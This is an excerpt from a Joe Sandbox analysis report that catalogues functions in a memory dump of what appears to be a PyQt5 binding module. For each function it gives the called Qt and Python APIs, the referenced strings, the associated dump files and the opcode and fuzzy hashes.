Opcode Fuzzy Hash: 628af6f8fed6b263d44f0b4a3d4e73de35a8bd124b7a2ca5cee463a6025fc384
Instruction Fuzzy Hash: 4B21FA65B0CB8682EA409B56F8587AEA761FB89FE4F484072DE4E17B68DF3CD444C700

Function 00007FFD86228F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON

Download Yara Rule

APIs

??8?$QVector@VQPointF@@@@QEBA_NAEBV0@@Z.QT5CORE ref: 00007FFD86228FC3
PyBool_FromLong.PYTHON3 ref: 00007FFD86228FCF

Strings

1J9, xrefs: 00007FFD86228F92

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ??8?$Bool_F@@@@FromLongPointV0@@Vector@
String ID: 1J9
API String ID: 3943828069-2407233842
Opcode ID: 2ce1f4dedaed99338dec23119f09a85451223b5f2b0bd0a75dac848bd7278e93
Instruction ID: c5881b4273b7acf236f79e7d6f2a889f6e71dfc2a992b507b596d747e3ceb9b8
Opcode Fuzzy Hash: 2ce1f4dedaed99338dec23119f09a85451223b5f2b0bd0a75dac848bd7278e93
Instruction Fuzzy Hash: 21213B35B0CA8282EB008F55F46426EB364FB88BA4F584572DE8D03B68DF3CD849C700

Function 00007FFD86285040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

??8QRawFont@@QEBA_NAEBV0@@Z.QT5GUI ref: 00007FFD862850C3
PyBool_FromLong.PYTHON3 ref: 00007FFD862850CC

Strings

1J9, xrefs: 00007FFD86285092

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_Font@@FromLongV0@@
String ID: 1J9
API String ID: 7697357-2407233842
Opcode ID: 663581735a77d748bb796bff7c3ecd5aabcbd0f7cfeae6a494a0114d2a03e6da
Instruction ID: 7e954875a25d805c506846e509f09941a506a5d95c65ff0947af1fc480ba2269
Opcode Fuzzy Hash: 663581735a77d748bb796bff7c3ecd5aabcbd0f7cfeae6a494a0114d2a03e6da
Instruction Fuzzy Hash: 39212F35B0CB9281EB408B4AF45426DB764FB89BA4F184072DE8D13B68DF3CD855C700

Function 00007FFD8624AAA0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?convertFromPlainText@Qt@@YA?AVQString@@AEBV2@W4WhiteSpaceMode@1@@Z.QT5GUI ref: 00007FFD8624AB37

Strings

convertFromPlainText, xrefs: 00007FFD8624AB9C
convertFromPlainText(plain: Optional[str], mode: Qt.WhiteSpaceMode = Qt.WhiteSpacePre) -> str, xrefs: 00007FFD8624AB90
J1|E, xrefs: 00007FFD8624AAED

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?convertFromMode@1@@PlainQt@@SpaceString@@Text@Whitemalloc
String ID: J1|E$convertFromPlainText$convertFromPlainText(plain: Optional[str], mode: Qt.WhiteSpaceMode = Qt.WhiteSpacePre) -> str
API String ID: 1410361493-631601234
Opcode ID: 6f84caae93879f21df597aab1cbae654888be199beed0ec581baf0fee3420208
Instruction ID: 1bd1d3bc5fc56d252723e2ed3ca423aa6abc060155a8050a3e368f6181629cd4
Opcode Fuzzy Hash: 6f84caae93879f21df597aab1cbae654888be199beed0ec581baf0fee3420208
Instruction Fuzzy Hash: 2531047670CB4586EB509F16E8683AD33A4FB48BA0F95417ACA9D43720DF3DD989CB40

Function 00007FFD862A4E90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD862A4F13

Strings

QQuaternion, xrefs: 00007FFD862A4F39
isNull, xrefs: 00007FFD862A4F32
isNull(self) -> bool, xrefs: 00007FFD862A4F26

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: QQuaternion$isNull$isNull(self) -> bool
API String ID: 2610644205-767493401
Opcode ID: d46b0f872a6933754f262951fe40ed370de628118b9c66d6902bf1a20cfb20dc
Instruction ID: 34b3bd2adce1d6e496b5b9975099f0b532d5dfe7d773453f1eef3335942c623b
Opcode Fuzzy Hash: d46b0f872a6933754f262951fe40ed370de628118b9c66d6902bf1a20cfb20dc
Instruction Fuzzy Hash: 0221D172B08A0A91EB009B39D4951A873A4FF08761F589276EF5C67260EF78E98CC340

Function 00007FFD862A6EB0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?transform@QPainter@@QEBAAEBVQTransform@@XZ.QT5GUI ref: 00007FFD862A6F0D

Strings

worldTransform, xrefs: 00007FFD862A6F7A
QPainter, xrefs: 00007FFD862A6F81
worldTransform(self) -> QTransform, xrefs: 00007FFD862A6F6E

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?transform@Painter@@Transform@@malloc
String ID: QPainter$worldTransform$worldTransform(self) -> QTransform
API String ID: 1370134044-1684972711
Opcode ID: 8d0805424737bf8c514fd79f4655f5f9fa4fa638b9f75a0b95fe9d8ec73de10e
Instruction ID: eadfb51cf21e064948e6a31f24065f504c419546ccc0007f1ae95111bd560019
Opcode Fuzzy Hash: 8d0805424737bf8c514fd79f4655f5f9fa4fa638b9f75a0b95fe9d8ec73de10e
Instruction Fuzzy Hash: 2E215166E18F86C2E700DF28D8556AD3764FB98B98F459271DE4D13322DF78E584C340

Function 00007FFD86226CC0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50COMMON

Download Yara Rule

APIs

?contains@?$QVector@VQPointF@@@@QEBA_NAEBVQPointF@@@Z.QT5CORE ref: 00007FFD86226D3B

Strings

1J1, xrefs: 00007FFD86226CF4
__contains__, xrefs: 00007FFD86226D77
QPolygonF, xrefs: 00007FFD86226D83

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Point$?contains@?$F@@@F@@@@Vector@
String ID: 1J1$QPolygonF$__contains__
API String ID: 2208412981-382568683
Opcode ID: 50b2ff71bed31f3bed3fa13508aeacf3949918b5da3ed82a3b4466a52e5dc0ab
Instruction ID: 1e829f8ec69407f515c027991b351dca865ef43941cba5a607df4f1572a4751a
Opcode Fuzzy Hash: 50b2ff71bed31f3bed3fa13508aeacf3949918b5da3ed82a3b4466a52e5dc0ab
Instruction Fuzzy Hash: 2D21EA76B0CB4682DB408F1AF8545AAB7A5FB88BE4F444176EA8E47764EF3CD844C740

Function 00007FFD86228D90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD86228E10

Strings

end, xrefs: 00007FFD86228DE6, 00007FFD86228E2F
end(self) -> bool, xrefs: 00007FFD86228E23
QPaintEngine, xrefs: 00007FFD86228DED, 00007FFD86228E36

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: QPaintuser$end$end(self) -> bool
API String ID: 2610644205-2785883462
Opcode ID: 51c7e4d3a1c4372cc5bdfda3722beaebf0b41c43579b42b789f66762df8b19c5
Instruction ID: 1740cc50dcbbc1e4c69289841073f304e2271ff3c28539c4876606fedeb7d0ea
Opcode Fuzzy Hash: 51c7e4d3a1c4372cc5bdfda3722beaebf0b41c43579b42b789f66762df8b19c5
Instruction Fuzzy Hash: 43112871B18A5AD2EB00DF14E8A86BC73A4FB44B65F990472CA5D47320EF7CD999C340

Function 00007FFD862AEF80 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?fromPlainText@QTextDocumentFragment@@SA?AV1@AEBVQString@@@Z.QT5GUI ref: 00007FFD862AEFDE

Strings

fromPlainText(plainText: Optional[str]) -> QTextDocumentFragment, xrefs: 00007FFD862AF031
fromPlainText, xrefs: 00007FFD862AF03D
QTextDocumentFragment, xrefs: 00007FFD862AF044

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?fromDocumentFragment@@PlainString@@@TextText@malloc
String ID: QTextDocumentFragment$fromPlainText$fromPlainText(plainText: Optional[str]) -> QTextDocumentFragment
API String ID: 4213432160-4182165478
Opcode ID: 53c6d7b3332400eb7f8eb34feffc844fe08f4d46ad714dbf4fccf714edbbd4bd
Instruction ID: c33437f685dd44f422b859acbf6877dec833315dc191e09ba502abca302ec4ff
Opcode Fuzzy Hash: 53c6d7b3332400eb7f8eb34feffc844fe08f4d46ad714dbf4fccf714edbbd4bd
Instruction Fuzzy Hash: 98212C7671CB4686DB409F16F8645AE77A0FB89BA4F845076EA8E43724DF3CE844CB00

Function 00007FFD8626A220 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?format@QSyntaxHighlighter@@IEBA?AVQTextCharFormat@@H@Z.QT5GUI ref: 00007FFD8626A28D

Strings

format, xrefs: 00007FFD8626A2CA
format(self, pos: int) -> QTextCharFormat, xrefs: 00007FFD8626A2BE
QSyntaxHighlighter, xrefs: 00007FFD8626A2D1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?format@CharFormat@@Highlighter@@SyntaxTextmalloc
String ID: QSyntaxHighlighter$format$format(self, pos: int) -> QTextCharFormat
API String ID: 648193224-1897865735
Opcode ID: e2e8e15148d6bca64dfeafde155004a82f4124b40232519e51395294d07d07cd
Instruction ID: aad3f78185e3391407310ecdda0a17b6804630c75021b5970ca945f4df17453b
Opcode Fuzzy Hash: e2e8e15148d6bca64dfeafde155004a82f4124b40232519e51395294d07d07cd
Instruction Fuzzy Hash: F1114936B08B46C2EB00DF65E8A86AD33A5FB48BA4F954036CA4D03720DF3DD949C700

Function 00007FFD86264230 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON

Download Yara Rule

APIs

PyLong_FromUnsignedLong.PYTHON3 ref: 00007FFD862642A6

Strings

toRgb16, xrefs: 00007FFD862642C4
QRgba64, xrefs: 00007FFD862642CB
toRgb16(self) -> int, xrefs: 00007FFD862642B8

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
